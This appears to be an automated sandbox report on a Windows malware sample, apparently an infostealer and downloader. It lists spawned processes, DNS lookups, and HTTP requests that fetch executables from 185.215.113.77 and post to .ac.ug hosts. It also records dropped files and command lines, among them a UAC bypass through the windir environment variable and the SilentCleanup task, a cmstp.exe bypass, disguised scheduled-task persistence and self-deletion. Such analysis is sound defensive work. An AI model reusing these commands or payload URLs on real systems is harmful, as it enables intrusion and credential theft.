Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | June 4, 2021, 6:09 p.m. | June 4, 2021, 6:23 p.m. |
-
-
-
-
oxcxcvhgfc.exe "{path}"
2408
-
-
axcxcvhgfc.exe "{path}"
1188
-
-
-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pYVWAjXtpzU" /XML "C:\Users\test22\AppData\Local\Temp\tmpF3DA.tmp"
240 -
lGN88VeVbt.exe "{path}"
3056
-
-
-
KqbKspamd9.exe "C:\Users\test22\AppData\Local\Temp\KqbKspamd9.exe"
2984 -
-
-
reg.exe reg delete hkcu\Environment /v windir /f
2616 -
reg.exe reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
1636 -
schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
2080
-
-
-
-
-
-
cmstp.exe "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\1vt3brkt.inf
1772
-
-
-
-
-
powershell.exe "powershell" Get-MpPreference -verbose
2624
-
-
-
-
-
schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
2520
-
-
-
cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcvb.exe"
2712-
timeout.exe timeout /T 10 /NOBREAK
3040
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1848
Name | Response | Post-Analysis Lookup |
---|---|---|
nothinglike.ac.ug | 79.134.225.25 | |
brudfascaqezd.ac.ug | ||
tttttt.me | 95.216.186.40 | |
veronika.ac.ug | 185.215.113.77 | |
veronikaa.ac.ug | 185.215.113.77 | |
cdn.discordapp.com | 162.159.129.233 |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49205 95.216.186.40:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=tttttt.me | ff:46:0a:ed:46:1a:92:da:d9:8a:95:d8:4b:c2:3d:51:b8:73:06:13 |
TLSv1 192.168.56.101:49293 162.159.130.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
TLSv1 192.168.56.101:49320 162.159.130.233:443 |
None | None | None |
TLSv1 192.168.56.101:49294 162.159.130.233:443 |
None | None | None |
TLSv1 192.168.56.101:49318 162.159.130.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.215.113.77/axcxcvhgfc.exe | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://34.88.140.135/ | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://34.88.140.135//l/f/L1VU1nkBuI_ccNKoeTXp/60386bf3c5b2b54595947b12ff770ab9abe3aa9a | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://34.88.140.135//l/f/L1VU1nkBuI_ccNKoeTXp/cc8a94f61ad1ac31ed9d2c0f0fef1ca23f6e10e5 | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.215.113.77/ac.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.215.113.77/oxcxcvhgfc.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.215.113.77/rc.exe | ||||||
suspicious_features | POST method with no referer header | suspicious_request | POST http://veronika.ac.ug/index.php | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.215.113.77/ds1.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.215.113.77/ds2.exe | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://185.215.113.77/cc.exe | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://veronikaa.ac.ug/softokn3.dll | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://veronikaa.ac.ug/sqlite3.dll | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST http://veronikaa.ac.ug/freebl3.dll | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://tttttt.me/brikitiki |
request | GET http://185.215.113.77/axcxcvhgfc.exe |
request | POST http://34.88.140.135/ |
request | GET http://34.88.140.135//l/f/L1VU1nkBuI_ccNKoeTXp/60386bf3c5b2b54595947b12ff770ab9abe3aa9a |
request | GET http://34.88.140.135//l/f/L1VU1nkBuI_ccNKoeTXp/cc8a94f61ad1ac31ed9d2c0f0fef1ca23f6e10e5 |
request | GET http://185.215.113.77/ac.exe |
request | GET http://185.215.113.77/oxcxcvhgfc.exe |
request | GET http://185.215.113.77/rc.exe |
request | POST http://veronika.ac.ug/index.php |
request | GET http://185.215.113.77/ds1.exe |
request | GET http://185.215.113.77/ds2.exe |
request | GET http://185.215.113.77/cc.exe |
request | POST http://veronikaa.ac.ug/softokn3.dll |
request | POST http://veronikaa.ac.ug/sqlite3.dll |
request | POST http://veronikaa.ac.ug/freebl3.dll |
request | GET https://tttttt.me/brikitiki |
request | GET https://cdn.discordapp.com/attachments/720918485122940978/850158270907678730/Xypgtvglqrlgdvgezyimsisukuqhicz |
request | GET https://cdn.discordapp.com/attachments/720918485122940978/850158871501602823/Cdfyxciknlozqdclvjieazyvhyfqdvt |
request | POST http://34.88.140.135/ |
request | POST http://veronika.ac.ug/index.php |
request | POST http://veronikaa.ac.ug/softokn3.dll |
request | POST http://veronikaa.ac.ug/sqlite3.dll |
request | POST http://veronikaa.ac.ug/freebl3.dll |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\open1.png.lnk |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\AccessibleMarshal.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\vcruntime140.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-convert-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-timezone-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\softokn3.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-math-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\mozMapi32_InUse.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-heap-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\msvcp140.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-localization-l1-2-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l1-2-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\AccessibleHandler.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\breakpadinjector.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-multibyte-l1-1-0.dll |
file | C:\Users\Public\Xypgtv\Xypgtv.exe |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-interlocked-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\lgpllibs.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-rtlsupport-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\ldap60.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-runtime-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\lGN88VeVbt.exe |
file | C:\Users\test22\AppData\Local\Temp\oxcxcvhgfc.exe |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll |
file | C:\Windows\Temp\m5smgpbx.exe |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-heap-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\ucrtbase.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l2-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-conio-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-string-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\mozMapi32.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\prldap60.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-1.dll |
file | C:\Users\test22\AppData\Roaming\pYVWAjXtpzU.exe |
file | C:\Users\Public\KDECO.bat |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-memory-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-util-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\mozglue.dll |
file | C:\Users\Public\Trast.bat |
file | C:\Users\Public\UKO.bat |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-profile-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processenvironment-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-handle-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\sqlite3.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-private-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-process-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\PujMnRGyIh.exe |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-namedpipe-l1-1-0.dll |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\open1.png.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\sn.txt.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.pyw.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\agent.pyw.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\exit.png.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\readme.txt.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.txt.lnk |
file | C:\Users\test22\AppData\LocalLow\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\age.pyw.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\office_2007.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\open.PNG.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\util.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Python27.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Office.2010.Toolkit.and.EZ-Activator.v2.1.5.Final.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\click.py.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\Settings.ini.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Recent\agent.py.lnk |
cmdline | C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat |
cmdline | "powershell" Get-MpPreference -verbose |
cmdline | /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\sqlcmd.exe" |
cmdline | schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I |
cmdline | schtasks.exe /Create /TN "Updates\pYVWAjXtpzU" /XML "C:\Users\test22\AppData\Local\Temp\tmpF3DA.tmp" |
cmdline | "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pYVWAjXtpzU" /XML "C:\Users\test22\AppData\Local\Temp\tmpF3DA.tmp" |
cmdline | cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcvb.exe" |
file | C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe |
file | C:\Users\test22\AppData\Local\Temp\zxcvb.exe |
file | C:\Users\test22\AppData\Local\Temp\oxcxcvhgfc.exe |
file | C:\Users\test22\AppData\Local\Temp\KqbKspamd9.exe |
file | C:\Users\test22\AppData\Local\Temp\IlgCQ4S1cW.exe |
file | C:\Users\test22\AppData\Local\Temp\aPMMzOSlXz.exe |
file | C:\Users\test22\AppData\Local\Temp\PujMnRGyIh.exe |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\IlgCQ4S1cW.exe |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l2-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-locale-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\breakpadinjector.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\prldap60.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-private-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\nss3.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-namedpipe-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\mozglue.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-libraryloader-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\softokn3.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\vcruntime140.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-environment-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\MapiProxy.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\IA2Marshal.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-heap-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-time-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-math-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-string-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-memory-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-sysinfo-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-util-l1-1-0.dll |
file | C:\Users\test22\AppData\Local\Temp\axcxcvhgfc.exe |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-localization-l1-2-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-filesystem-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\msvcp140.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-stdio-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\AccessibleHandler.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\qipcap.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-utility-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processthreads-l1-1-1.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-heap-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\sqlite3.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\ucrtbase.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\libEGL.dll |
file | C:\Users\test22\AppData\Local\Temp\aPMMzOSlXz.exe |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-processenvironment-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-handle-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\nssckbi.dll |
file | C:\Users\test22\AppData\Local\Temp\oxcxcvhgfc.exe |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-timezone-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\nssdbm3.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\lgpllibs.dll |
file | C:\Users\test22\AppData\Roaming\pYVWAjXtpzU.exe |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-synch-l1-2-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-crt-conio-l1-1-0.dll |
file | C:\Users\test22\AppData\LocalLow\gC9tT2iQ3s\api-ms-win-core-file-l1-2-0.dll |